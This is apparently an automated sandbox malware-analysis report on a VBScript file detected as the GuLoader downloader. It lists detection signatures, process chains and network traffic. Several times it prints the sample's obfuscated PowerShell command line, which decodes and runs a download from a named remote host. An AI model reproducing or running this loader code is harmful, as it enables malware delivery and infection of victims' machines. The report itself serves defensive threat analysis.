Windows Analysis Report
Kostenvoranschlag.vbs

Overview

General Information

Sample name:	Kostenvoranschlag.vbs
Analysis ID:	1541205
MD5:	080a163f1709fc1834429846644abf60
SHA1:	998d9f5a1e0c00788d623cec753e34180135eb0c
SHA256:	50a0b8b110c99e220f5872fc64fce72363511dcaae0a13a844537872ba349af3
Tags:	vbsuser-lowmal3
Infos:

Detection

GuLoader

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Malicious sample detected (through community Yara rule)

VBScript performs obfuscated calls to suspicious functions

Yara detected GuLoader

Yara detected Powershell download and execute

AI detected suspicious sample

Found suspicious powershell code related to unpacking or dynamic code loading

Sigma detected: WScript or CScript Dropper

Suspicious execution chain found

Suspicious powershell command line found

Uses ping.exe to check the status of other devices and networks

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Wscript starts Powershell (via cmd or directly)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Found WSH timer for Javascript or VBS script (likely evasive script)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

JA3 SSL client fingerprint seen in connection with other malware

Java / VBScript file with very long strings (likely obfuscated code)

May sleep (evasive loops) to hinder dynamic analysis

Queries the volume information (name, serial number etc) of a device

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Very long command line found

Yara signature match

Classification

Malware Threat Intel
Provided by

Name	Description	Attribution	Blogpost URLs	Link
CloudEyE, GuLoader	CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.	No Attribution	http://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/bluebottle-banks-targeted-africa https://0x00sec.org/t/analyzing-modern-malware-techniques-part-3/18943 https://any.run/cybersecurity-blog/deobfuscating-guloader/ https://asec.ahnlab.com/en/55978/ https://blog.checkpoint.com/security/march-2023s-most-wanted-malware-new-emotet-campaign-bypasses-microsoft-blocks-to-distribute-malicious-onenote-files/	https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Signatures

AV Detection

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 95.6% probability

Source: unknown

HTTPS traffic detected: 185.181.240.15:443 -> 192.168.2.7:49700 version: TLS 1.2

Source:	Binary string: *on.pdb source: powershell.exe, 00000004.00000002.1460713089.000001677BC95000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: tem.Core.pdbz' source: powershell.exe, 0000000D.00000002.2539499175.0000000002D7F000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: tomation.pdbGk source: powershell.exe, 00000004.00000002.1460713089.000001677BC95000.00000004.00000020.00020000.00000000.sdmp

Software Vulnerabilities

Suspicious execution chain found

Source: C:\Windows\System32\wscript.exe

Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Networking

Uses ping.exe to check the status of other devices and networks

Source: C:\Windows\System32\wscript.exe

Process created: C:\Windows\System32\PING.EXE ping Horm5zl_6637.6637.6637.657e

JA3 SSL client fingerprint seen in connection with other malware

Source: Joe Sandbox View

JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Uses a known web browser user agent for HTTP communication

Source: global traffic

HTTP traffic detected: GET /Perspectivist.snp HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: www.hotelseneca.roConnection: Keep-Alive

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic

HTTP traffic detected: GET /Perspectivist.snp HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: www.hotelseneca.roConnection: Keep-Alive

Source: global traffic	DNS traffic detected: DNS query: Horm5zl_6637.6637.6637.657e
Source: global traffic	DNS traffic detected: DNS query: www.hotelseneca.ro

Source: powershell.exe, 0000000D.00000002.2569380323.0000000007444000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.micro#
Source: powershell.exe, 0000000D.00000002.2569380323.00000000073D0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.microsoftP
Source: powershell.exe, 00000004.00000002.1391887473.0000016765994000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://hotelseneca.ro
Source: powershell.exe, 00000004.00000002.1453020255.0000016773913000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2561543050.0000000005A5D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 0000000D.00000002.2543840351.0000000004B47000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000004.00000002.1391887473.00000167638A1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2543840351.00000000049F1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 0000000D.00000002.2543840351.0000000004B47000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000004.00000002.1391887473.0000016765994000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.hotelseneca.ro
Source: powershell.exe, 00000004.00000002.1391887473.00000167638A1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 0000000D.00000002.2543840351.00000000049F1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore6lB
Source: powershell.exe, 0000000D.00000002.2561543050.0000000005A5D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 0000000D.00000002.2561543050.0000000005A5D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 0000000D.00000002.2561543050.0000000005A5D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 0000000D.00000002.2543840351.0000000004B47000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000004.00000002.1391887473.000001676463C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://go.micro
Source: powershell.exe, 00000004.00000002.1453020255.0000016773913000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2561543050.0000000005A5D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 00000004.00000002.1391887473.00000167658E3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1391887473.0000016763AC7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.hotelseneca.ro
Source: powershell.exe, 00000004.00000002.1391887473.0000016763AC7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.hotelseneca.ro/Perspectivist.snpP
Source: powershell.exe, 0000000D.00000002.2543840351.0000000004B47000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.hotelseneca.ro/Perspectivist.snpXR
Source: powershell.exe, 00000004.00000002.1460713089.000001677BC95000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.hotelseneca.ro/Perspectivist.snpmuim

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49700
Source: unknown	Network traffic detected: HTTP traffic on port 49700 -> 443

Source: unknown

HTTPS traffic detected: 185.181.240.15:443 -> 192.168.2.7:49700 version: TLS 1.2

System Summary

Malicious sample detected (through community Yara rule)

Source: amsi64_7400.amsi.csv, type: OTHER	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: amsi32_8108.amsi.csv, type: OTHER	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 7400, type: MEMORYSTR	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 8108, type: MEMORYSTR	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Source: C:\Windows\System32\wscript.exe	COM Object queried: WBEM Locator HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}	Jump to behavior
Source: C:\Windows\System32\wscript.exe	COM Object queried: Windows Management and Instrumentation HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}	Jump to behavior
Source: C:\Windows\System32\wscript.exe	COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}	Jump to behavior

Wscript starts Powershell (via cmd or directly)

Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Texguino Trave gastnderens Oppustes #>;$Nrtagenhedens='Forgrenedes';<#Samlemappens Slenderization Forepale Kiloers Bulmeurters #>;$Skuldrings11=$Varies+$host.UI; function Blaaklokkers($Kmnings246){If ($Skuldrings11) {$Koalabjrn++;}$Afvundnes=$Maleficium+$Kmnings246.'Length'-$Koalabjrn; for( $Katina=4;$Katina -lt $Afvundnes;$Katina+=5){$Tachytelic=$Katina;$Presartorial+=$Kmnings246[$Katina];$Harpalides='Glaeder';}$Presartorial;}function Fritidsklubberne($Fjernsynsapparat){ . ($Festsale) ($Fjernsynsapparat);}$Mellemstykket=Blaaklokkers 'C mpMUnaboRunbz.awaiComplAzuml RaaaWall/Amal ';$Arkipelagers='De d[ UncNP edEDaabtUn.e.Fjl.SNoncEMiljR Intv PiniE.toCSyllESyntPnervoLyriIafsyNOddet .olMK meaFavnnfra,A RungHabie KnorArga]Ingo:Kr g:AllesW.ipeBemacskftuBl,arSkovi CentUnlaY EstPObseRAriloMussTTrypOPaucCLageOTyp,lKerm Mist= Hy, ';$Mellemstykket+=Blaaklokkers 'Kors5Camb.P ls0Ande Paat( igiWRigsiSjusn InsdPolyo enrwMelosCykl endNOverT nd Gaar1Over0Atro.Mine0Unpr;Cha ,ikkW andiKancnrnne6Ro,e4Re r; K g Pr,xheim6Pawl4Feti; ora G ourCatavuneq:Peri1 Sem3Adve1 Pup.M,na0Aabe) Kli OveGPrd eWoolcSuppk PreoUni./Afma2Bane0 Fej1 ea0Skin0preo1,ros0Damp1Sand Ha FFlavi Sndr Ague DisfGorgoAbstx g n/Mari1 ave3 .al1Frem.gyna0Bes, ';$Arkipelagers+='Hold[StanNGroueA snTAbey.ProtS PrsEoprec inmU TwyrKretienertT anyRewrp SedrSleeoAylitGadeOProtCBaadoVeneLDepoTTtelY.ittpInteeToma] Sla ';$Furthy=Blaaklokkers 'InteU In sS edELunerM un-RemiaSpriGaikiEContN O eT rbe ';$Opvejningerne=Blaaklokkers ' ureh fsotBalltStabpStyls ati:Shet/Anno/,efowbejlw SubwFede.EpishHa doSt,nt OuteKloalOuabs ecie,usknBiseebefrcIndkaVarm. xplr Ai,oFasc/ MulPAv neFamirLyknsReprpStrieSnorcAnsatSnkeiVituv BesiUnu.s EcltHapu.RibbsWienn ybgpUni ';$Vellumy=Blaaklokkers 'Pseu>Adre ';$Festsale=Blaaklokkers 'tingiL rrEMediX,toc ';$Kua='Unfanged';$Arkipelagers+='thor:Unde:KdkrtPaloLRecosEnhe1S bs2 Hom ';$Befjelsernes='\Commandoes.Gre';Fritidsklubberne (Blaaklokkers 'Grav$Du,egTripL ndhoClosbTredARe aLSuff:DassBJuguA .eklOutlA Medr ,udaEli OKonk=vrne$WageeBurfnPr.tvSpri:F rsAshivPFi vpensodfi,aaDermTOtheaRega+ngle$,dspbgangE Ny f IltjGrenEReprL Ch s Fe ED varKnocNRegneL biS Irr ');Fritidsklubberne (Blaaklokkers ' Ci.$ torgSelvLB ddoFiloB indAKjruL Ko.:SucuS ,raaOv,rLLsenmKonceAitkdUdskIDoubg alt ermNBamlImruwN Fu GFormE elR.trasVrte=Rntg$shepOFe tpIlliv UbeEParajUnden AtoI OffnAbj gDespe LadrMononMissEAll . .erSfllePKanolR ali,almtKitt(nonb$BughV inE fr,L inylcageUUr sMVi.jyS nf)Regn ');Fritidsklubberne (Blaaklokkers $Arkipelagers);$Opvejningerne=$Salmedigtningers[0];$Autostandardization=(Blaaklokkers 'Moda$BobfgMuslLL viO omabAwarATes l for: .eisTvinnCommd Blae My rPoemlUn aeKmpem PranSndeiLokaNSt eGTrk,ESt iRDa enHundeBa f=UnheNRaasETeedWUn e-AdepO,edtb LuejSem.eSuppCSkrmtStil BesS PhoYClins Sint C.iEa epm Lyk. PernHar E ksiT A t. dewJgereImbuBLiviCPalelamini stvEBl gNUnaptTa.j
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Texguino Trave gastnderens Oppustes #>;$Nrtagenhedens='Forgrenedes';<#Samlemappens Slenderization Forepale Kiloers Bulmeurters #>;$Skuldrings11=$Varies+$host.UI; function Blaaklokkers($Kmnings246){If ($Skuldrings11) {$Koalabjrn++;}$Afvundnes=$Maleficium+$Kmnings246.'Length'-$Koalabjrn; for( $Katina=4;$Katina -lt $Afvundnes;$Katina+=5){$Tachytelic=$Katina;$Presartorial+=$Kmnings246[$Katina];$Harpalides='Glaeder';}$Presartorial;}function Fritidsklubberne($Fjernsynsapparat){ . ($Festsale) ($Fjernsynsapparat);}$Mellemstykket=Blaaklokkers 'C mpMUnaboRunbz.awaiComplAzuml RaaaWall/Amal ';$Arkipelagers='De d[ UncNP edEDaabtUn.e.Fjl.SNoncEMiljR Intv PiniE.toCSyllESyntPnervoLyriIafsyNOddet .olMK meaFavnnfra,A RungHabie KnorArga]Ingo:Kr g:AllesW.ipeBemacskftuBl,arSkovi CentUnlaY EstPObseRAriloMussTTrypOPaucCLageOTyp,lKerm Mist= Hy, ';$Mellemstykket+=Blaaklokkers 'Kors5Camb.P ls0Ande Paat( igiWRigsiSjusn InsdPolyo enrwMelosCykl endNOverT nd Gaar1Over0Atro.Mine0Unpr;Cha ,ikkW andiKancnrnne6Ro,e4Re r; K g Pr,xheim6Pawl4Feti; ora G ourCatavuneq:Peri1 Sem3Adve1 Pup.M,na0Aabe) Kli OveGPrd eWoolcSuppk PreoUni./Afma2Bane0 Fej1 ea0Skin0preo1,ros0Damp1Sand Ha FFlavi Sndr Ague DisfGorgoAbstx g n/Mari1 ave3 .al1Frem.gyna0Bes, ';$Arkipelagers+='Hold[StanNGroueA snTAbey.ProtS PrsEoprec inmU TwyrKretienertT anyRewrp SedrSleeoAylitGadeOProtCBaadoVeneLDepoTTtelY.ittpInteeToma] Sla ';$Furthy=Blaaklokkers 'InteU In sS edELunerM un-RemiaSpriGaikiEContN O eT rbe ';$Opvejningerne=Blaaklokkers ' ureh fsotBalltStabpStyls ati:Shet/Anno/,efowbejlw SubwFede.EpishHa doSt,nt OuteKloalOuabs ecie,usknBiseebefrcIndkaVarm. xplr Ai,oFasc/ MulPAv neFamirLyknsReprpStrieSnorcAnsatSnkeiVituv BesiUnu.s EcltHapu.RibbsWienn ybgpUni ';$Vellumy=Blaaklokkers 'Pseu>Adre ';$Festsale=Blaaklokkers 'tingiL rrEMediX,toc ';$Kua='Unfanged';$Arkipelagers+='thor:Unde:KdkrtPaloLRecosEnhe1S bs2 Hom ';$Befjelsernes='\Commandoes.Gre';Fritidsklubberne (Blaaklokkers 'Grav$Du,egTripL ndhoClosbTredARe aLSuff:DassBJuguA .eklOutlA Medr ,udaEli OKonk=vrne$WageeBurfnPr.tvSpri:F rsAshivPFi vpensodfi,aaDermTOtheaRega+ngle$,dspbgangE Ny f IltjGrenEReprL Ch s Fe ED varKnocNRegneL biS Irr ');Fritidsklubberne (Blaaklokkers ' Ci.$ torgSelvLB ddoFiloB indAKjruL Ko.:SucuS ,raaOv,rLLsenmKonceAitkdUdskIDoubg alt ermNBamlImruwN Fu GFormE elR.trasVrte=Rntg$shepOFe tpIlliv UbeEParajUnden AtoI OffnAbj gDespe LadrMononMissEAll . .erSfllePKanolR ali,almtKitt(nonb$BughV inE fr,L inylcageUUr sMVi.jyS nf)Regn ');Fritidsklubberne (Blaaklokkers $Arkipelagers);$Opvejningerne=$Salmedigtningers[0];$Autostandardization=(Blaaklokkers 'Moda$BobfgMuslLL viO omabAwarATes l for: .eisTvinnCommd Blae My rPoemlUn aeKmpem PranSndeiLokaNSt eGTrk,ESt iRDa enHundeBa f=UnheNRaasETeedWUn e-AdepO,edtb LuejSem.eSuppCSkrmtStil BesS PhoYClins Sint C.iEa epm Lyk. PernHar E ksiT A t. dewJgereImbuBLiviCPalelamini stvEBl gNUnaptTa.j			Jump to behavior

Detected potential crypto function

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_00007FFAACBAD202	4_2_00007FFAACBAD202
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_00007FFAACBAC456	4_2_00007FFAACBAC456
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_00007FFAACE2026A	4_2_00007FFAACE2026A
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 13_2_03050A6A	13_2_03050A6A
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 13_2_03053762	13_2_03053762
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 13_2_0305DA40	13_2_0305DA40
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 13_2_0305D990	13_2_0305D990
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 13_2_03051D08	13_2_03051D08

Java / VBScript file with very long strings (likely obfuscated code)

Source: Kostenvoranschlag.vbs

Initial sample: Strings found which are bigger than 50

Very long command line found

Source: C:\Windows\System32\wscript.exe	Process created: Commandline size = 6513
Source: unknown	Process created: Commandline size = 6513
Source: C:\Windows\System32\wscript.exe	Process created: Commandline size = 6513	Jump to behavior

Yara signature match

Source: amsi64_7400.amsi.csv, type: OTHER	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: amsi32_8108.amsi.csv, type: OTHER	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 7400, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 8108, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution

Source: classification engine

Classification label: mal100.troj.expl.evad.winVBS@9/7@2/1

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Roaming\Commandoes.Gre

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7344:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8116:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7408:120:WilError_03

Source: C:\Windows\System32\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process Where Name = 'Kvartalets.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=7400
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=8108

Source: unknown	Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Kostenvoranschlag.vbs"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\PING.EXE ping Horm5zl_6637.6637.6637.657e
Source: C:\Windows\System32\PING.EXE	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Texguino Trave gastnderens Oppustes #>;$Nrtagenhedens='Forgrenedes';<#Samlemappens Slenderization Forepale Kiloers Bulmeurters #>;$Skuldrings11=$Varies+$host.UI; function Blaaklokkers($Kmnings246){If ($Skuldrings11) {$Koalabjrn++;}$Afvundnes=$Maleficium+$Kmnings246.'Length'-$Koalabjrn; for( $Katina=4;$Katina -lt $Afvundnes;$Katina+=5){$Tachytelic=$Katina;$Presartorial+=$Kmnings246[$Katina];$Harpalides='Glaeder';}$Presartorial;}function Fritidsklubberne($Fjernsynsapparat){ . ($Festsale) ($Fjernsynsapparat);}$Mellemstykket=Blaaklokkers 'C mpMUnaboRunbz.awaiComplAzuml RaaaWall/Amal ';$Arkipelagers='De d[ UncNP edEDaabtUn.e.Fjl.SNoncEMiljR Intv PiniE.toCSyllESyntPnervoLyriIafsyNOddet .olMK meaFavnnfra,A RungHabie KnorArga]Ingo:Kr g:AllesW.ipeBemacskftuBl,arSkovi CentUnlaY EstPObseRAriloMussTTrypOPaucCLageOTyp,lKerm Mist= Hy, ';$Mellemstykket+=Blaaklokkers 'Kors5Camb.P ls0Ande Paat( igiWRigsiSjusn InsdPolyo enrwMelosCykl endNOverT nd Gaar1Over0Atro.Mine0Unpr;Cha ,ikkW andiKancnrnne6Ro,e4Re r; K g Pr,xheim6Pawl4Feti; ora G ourCatavuneq:Peri1 Sem3Adve1 Pup.M,na0Aabe) Kli OveGPrd eWoolcSuppk PreoUni./Afma2Bane0 Fej1 ea0Skin0preo1,ros0Damp1Sand Ha FFlavi Sndr Ague DisfGorgoAbstx g n/Mari1 ave3 .al1Frem.gyna0Bes, ';$Arkipelagers+='Hold[StanNGroueA snTAbey.ProtS PrsEoprec inmU TwyrKretienertT anyRewrp SedrSleeoAylitGadeOProtCBaadoVeneLDepoTTtelY.ittpInteeToma] Sla ';$Furthy=Blaaklokkers 'InteU In sS edELunerM un-RemiaSpriGaikiEContN O eT rbe ';$Opvejningerne=Blaaklokkers ' ureh fsotBalltStabpStyls ati:Shet/Anno/,efowbejlw SubwFede.EpishHa doSt,nt OuteKloalOuabs ecie,usknBiseebefrcIndkaVarm. xplr Ai,oFasc/ MulPAv neFamirLyknsReprpStrieSnorcAnsatSnkeiVituv BesiUnu.s EcltHapu.RibbsWienn ybgpUni ';$Vellumy=Blaaklokkers 'Pseu>Adre ';$Festsale=Blaaklokkers 'tingiL rrEMediX,toc ';$Kua='Unfanged';$Arkipelagers+='thor:Unde:KdkrtPaloLRecosEnhe1S bs2 Hom ';$Befjelsernes='\Commandoes.Gre';Fritidsklubberne (Blaaklokkers 'Grav$Du,egTripL ndhoClosbTredARe aLSuff:DassBJuguA .eklOutlA Medr ,udaEli OKonk=vrne$WageeBurfnPr.tvSpri:F rsAshivPFi vpensodfi,aaDermTOtheaRega+ngle$,dspbgangE Ny f IltjGrenEReprL Ch s Fe ED varKnocNRegneL biS Irr ');Fritidsklubberne (Blaaklokkers ' Ci.$ torgSelvLB ddoFiloB indAKjruL Ko.:SucuS ,raaOv,rLLsenmKonceAitkdUdskIDoubg alt ermNBamlImruwN Fu GFormE elR.trasVrte=Rntg$shepOFe tpIlliv UbeEParajUnden AtoI OffnAbj gDespe LadrMononMissEAll . .erSfllePKanolR ali,almtKitt(nonb$BughV inE fr,L inylcageUUr sMVi.jyS nf)Regn ');Fritidsklubberne (Blaaklokkers $Arkipelagers);$Opvejningerne=$Salmedigtningers[0];$Autostandardization=(Blaaklokkers 'Moda$BobfgMuslLL viO omabAwarATes l for: .eisTvinnCommd Blae My rPoemlUn aeKmpem PranSndeiLokaNSt eGTrk,ESt iRDa enHundeBa f=UnheNRaasETeedWUn e-AdepO,edtb LuejSem.eSuppCSkrmtStil BesS PhoYClins Sint C.iEa epm Lyk. PernHar E ksiT A t. dewJgereImbuBLiviCPalelamini stvEBl gNUnaptTa.j
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" " <#Texguino Trave gastnderens Oppustes #>;$Nrtagenhedens='Forgrenedes';<#Samlemappens Slenderization Forepale Kiloers Bulmeurters #>;$Skuldrings11=$Varies+$host.UI; function Blaaklokkers($Kmnings246){If ($Skuldrings11) {$Koalabjrn++;}$Afvundnes=$Maleficium+$Kmnings246.'Length'-$Koalabjrn; for( $Katina=4;$Katina -lt $Afvundnes;$Katina+=5){$Tachytelic=$Katina;$Presartorial+=$Kmnings246[$Katina];$Harpalides='Glaeder';}$Presartorial;}function Fritidsklubberne($Fjernsynsapparat){ . ($Festsale) ($Fjernsynsapparat);}$Mellemstykket=Blaaklokkers 'C mpMUnaboRunbz.awaiComplAzuml RaaaWall/Amal ';$Arkipelagers='De d[ UncNP edEDaabtUn.e.Fjl.SNoncEMiljR Intv PiniE.toCSyllESyntPnervoLyriIafsyNOddet .olMK meaFavnnfra,A RungHabie KnorArga]Ingo:Kr g:AllesW.ipeBemacskftuBl,arSkovi CentUnlaY EstPObseRAriloMussTTrypOPaucCLageOTyp,lKerm Mist= Hy, ';$Mellemstykket+=Blaaklokkers 'Kors5Camb.P ls0Ande Paat( igiWRigsiSjusn InsdPolyo enrwMelosCykl endNOverT nd Gaar1Over0Atro.Mine0Unpr;Cha ,ikkW andiKancnrnne6Ro,e4Re r; K g Pr,xheim6Pawl4Feti; ora G ourCatavuneq:Peri1 Sem3Adve1 Pup.M,na0Aabe) Kli OveGPrd eWoolcSuppk PreoUni./Afma2Bane0 Fej1 ea0Skin0preo1,ros0Damp1Sand Ha FFlavi Sndr Ague DisfGorgoAbstx g n/Mari1 ave3 .al1Frem.gyna0Bes, ';$Arkipelagers+='Hold[StanNGroueA snTAbey.ProtS PrsEoprec inmU TwyrKretienertT anyRewrp SedrSleeoAylitGadeOProtCBaadoVeneLDepoTTtelY.ittpInteeToma] Sla ';$Furthy=Blaaklokkers 'InteU In sS edELunerM un-RemiaSpriGaikiEContN O eT rbe ';$Opvejningerne=Blaaklokkers ' ureh fsotBalltStabpStyls ati:Shet/Anno/,efowbejlw SubwFede.EpishHa doSt,nt OuteKloalOuabs ecie,usknBiseebefrcIndkaVarm. xplr Ai,oFasc/ MulPAv neFamirLyknsReprpStrieSnorcAnsatSnkeiVituv BesiUnu.s EcltHapu.RibbsWienn ybgpUni ';$Vellumy=Blaaklokkers 'Pseu>Adre ';$Festsale=Blaaklokkers 'tingiL rrEMediX,toc ';$Kua='Unfanged';$Arkipelagers+='thor:Unde:KdkrtPaloLRecosEnhe1S bs2 Hom ';$Befjelsernes='\Commandoes.Gre';Fritidsklubberne (Blaaklokkers 'Grav$Du,egTripL ndhoClosbTredARe aLSuff:DassBJuguA .eklOutlA Medr ,udaEli OKonk=vrne$WageeBurfnPr.tvSpri:F rsAshivPFi vpensodfi,aaDermTOtheaRega+ngle$,dspbgangE Ny f IltjGrenEReprL Ch s Fe ED varKnocNRegneL biS Irr ');Fritidsklubberne (Blaaklokkers ' Ci.$ torgSelvLB ddoFiloB indAKjruL Ko.:SucuS ,raaOv,rLLsenmKonceAitkdUdskIDoubg alt ermNBamlImruwN Fu GFormE elR.trasVrte=Rntg$shepOFe tpIlliv UbeEParajUnden AtoI OffnAbj gDespe LadrMononMissEAll . .erSfllePKanolR ali,almtKitt(nonb$BughV inE fr,L inylcageUUr sMVi.jyS nf)Regn ');Fritidsklubberne (Blaaklokkers $Arkipelagers);$Opvejningerne=$Salmedigtningers[0];$Autostandardization=(Blaaklokkers 'Moda$BobfgMuslLL viO omabAwarATes l for: .eisTvinnCommd Blae My rPoemlUn aeKmpem PranSndeiLokaNSt eGTrk,ESt iRDa enHundeBa f=UnheNRaasETeedWUn e-AdepO,edtb LuejSem.eSuppCSkrmtStil BesS PhoYClins Sint C.iEa epm Lyk. PernHar E ksiT A t. dewJgereImbuBLiviCPalelamini stvEBl gNUnaptTa.j
